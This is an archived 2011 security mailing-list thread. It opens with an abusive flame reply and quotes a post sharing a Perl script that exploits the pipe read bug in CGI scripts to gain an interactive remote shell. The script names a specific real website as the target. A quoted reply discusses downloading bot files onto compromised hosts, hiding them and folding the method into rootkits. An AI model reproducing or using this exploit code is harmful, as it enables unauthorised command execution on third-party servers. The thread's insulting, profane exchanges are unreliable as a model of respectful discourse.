Re: perl pipe exploit (drops you at a shell)

[xD 0x41 <secn3t () gmail com>]

Again... you speak nothing but annoying crap, like you are the moderator, or
some big CIA bullshit artist, you should stop acting like a fkn child and
using yahoo to spam from, we all can see now, very clearly, who the fucking
gitwad is, and you take that award with a bachelor and masters in wannabe
it-sec.
you know shit about anything, and, if grammar is a problem, then i suggest
YOU find another list, as YOU are NOT even allowed to be posting here..
So,... enjoy your friends, while they even last, or shuld i say, just put up
with you coz, your so full of crap "have my own security team" , and then "i
gcarry a gun" , your a fucking retard mate.
go get a home, get out of that box, and stop stealing mcdonalds wifi.
Idiot.
xd


On 16 October 2011 13:12, andrew.wallace <andrew.wallace () rocketmail com>wrote:

> Your intentional grammar errors are cringe-worthy and hard to read... if
> you want to stay a member of the list, start behaving normally.
>
> Andrew
>
> ------------------------------
> *From:* xD 0x41 <secn3t () gmail com>
> *To:* Marshall Whittaker <marshallwhittaker () gmail com>
> *Cc:* full-disclosure () lists grok org uk
> *Sent:* Sunday, October 16, 2011 1:44 AM
> *Subject:* Re: [Full-disclosure] perl pipe exploit (drops you at a shell)
>
> Thanks for the POST!
> hats VERY cool, althugh it was done before, and i did not match codes to
> see any differences/changes/updates, because I am aware that many systems
> are being fixed against this bug as I know, or rather, perl stdinout is
> maybe being patched in some versions, although it does seem to work stable
> on Debian lenny and thats ok, that would mean most likely Ubuntu is also
> vulnerable... Personally, i have code wich is about half the size of bth the
> ones i have seen, but they do a download to box, so, it is a personal
> wget.pl wich gets , makes dir if none exists, cds to dir, and the cmd is
> simply like this
> ./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps
> This would then save file, and chmod it automatically as chmod filename +x
> , wich is just a command i thought was critical when this type of stuff is
> used... So, I might try and personalise this, and see if it works better, I
> know the first method i was using to get, was nothing like the one i have
> now wich is pipe() also but, it just totally makes the need for using wget
> not needed, and then also the file and whole session of ./file.pl, gets
> saved to bash_history as a . on its own line, wich is including if you
> upload/get files from one box and up to the local one your sitting on.
>
> Your version, looks the most adaptive one, and would be great to have
> enabled on any connectback shell, maybe chmod cmd could be automatic when it
> puts a file upload/download, however you access it, I know main way a user
> on a control net, would simply privmsg it, and use that pipe exploiting to
> upload everything, chmod, and hide eveything, wich is probably the BEST
> addon i could thinkof for any rootkit, and even just upload command, if you
> target index.php, and look for pg=/page=, maybe a simple my
> @array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to
> target things, and make it show simple CMDS> output on connect-back, then
> print a quick sysinfo and, makesure to show things right on the connectback,
> then have this, and direct a while($perl_pipe_uploader2) {} ,maybe adding in
> if/else using the first perlpipeupload.pl as the first method.. this could
> be great!
> i will look for my code wich is more like a wget but, it uses the exact
> same bugs to , actually works better than the standard get/wget or fetch, as
> it is no switches needed, just the corect args, and it does the rest in
> execl() mode, thru this, i have i think in old days probably used this bug
> somuch, it became a feautre for awhile :P
> I think the scripting is great, the code is good, clear and concise,. and
> very easy to simply use as an addon case 'perlpipeupload2': or, however you
> may add it.. it is awesome code. I ight have to snippet this posting and,
> show both, or, al  3 on my website (crazycoders.com) ,and if you have a
> Posting already up wich will stay there, id be happy to point to it, and
> also paste it, so, thanks!
> i will try and find the code for the wget/put/uploader, when your in PM
> with a bot and you do !cmd mywget a.at/bot /b/o/t , only switches is -s|-n
> for silent or notice user exact infos, prettymuch a wget-summary.
> I like the code and appreciate your posting. It is a nice bug and even
> nicer method to exploit it.
> regards,
> xd-- // #haxnet@EFnet // Independant Arsehole
>
>
> PS: shizzle my nizzle matey!  shizzle it good!
>
>
>
>
> On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker () gmail com>wrote:
>
> Well shit.  It did send twice. :(  Now I look like a goof, haha.
>
> On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <
> marshallwhittaker () gmail com> wrote:
>
> This works off the perl pipe read bug, you can just input the first and
> second parts of the web address (with http:// included) and it'll drop you
> at a shell.  When using cd you must use the absolute path because I was too
> lazy to do it the correct way. ;-).  I know this is pretty easy stuff, it
> works off those vulns that can just be exploited with a web browser, but
> this gives you a shell.  So have at it guys & gals!  Had to resend because I
> got some message about my attachment being blocked.  Not sure if it really
> was, though, I'll send again anyway.  Hope this isn't spamming the list. =/
>
> Site:
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
> Useage: ./sublime.pl "
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=";
> "&desc=Stat+File"
>
> Should work on most perl cgi scripts that are vulnerable to | read bug.
>  Please note, it's not a "real" shell, but almost everything works, except
> things that won't go in one instance like cd-ing and env vars, etc.
>
> Play nice!
>
> --oxagast
>
> [CODE]
>
> #!/usr/bin/perl
>
> # adaptive cgi shell by oxagast
>
> use LWP::Simple;
> $part1 = @ARGV[0]; $part2 = @ARGV[1];
> print "Making buffer...\n";
> for $bet (100..200) {
> $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
> }
> print "Exploiting...\n";
> $id = get("$part1\|id\|$part2");
> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
> print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
> $uid = $1;
> print "$uid\n";
> while (0 == 0) {
> print "\$ ";
> $cmd = <STDIN>;
>  chomp($cmd);
> if ($cmd =~ m/cd (\/.*)/) {
> $dir = $1;
>  }
> if ($cmd eq "cd ..") {
> $dir =~ s/(.*)\/.*/\/\1/;
>  }
> if ($cmd eq "pwd") {
> $dirjunk = $dir;
>  if ($dirjunk eq "//") {
> $dirjunk = "/";
> }
>  }
> $dirjunk = "cd $dir\;$cmd";
>  $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
> $cmdhex =~ s/(..)/\\\\x$1/g;
>  get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
> $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
>  @backjunk = split("\n", $backjunk2);
> get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
>  get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
> $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
>  @backjunk_split = split("\n", $backjunk_as);
> $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
>  $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
> $thismanylines = $1 - 1;
> for $junknum (0..scalar(@backjunk_split)) {
>  for $fuzz (10..100+$thismanylines) {
> if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
>  $middle = $1;
> @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
> @backjunk_split[$junknum] =~ s/$1//;
>  @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
> @backjunk_split[$junknum] =~ s/$1//;
>  print "$backjunk_split[$junknum]\n";
> }
> }
>  }
> }
>
> [/CODE]
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/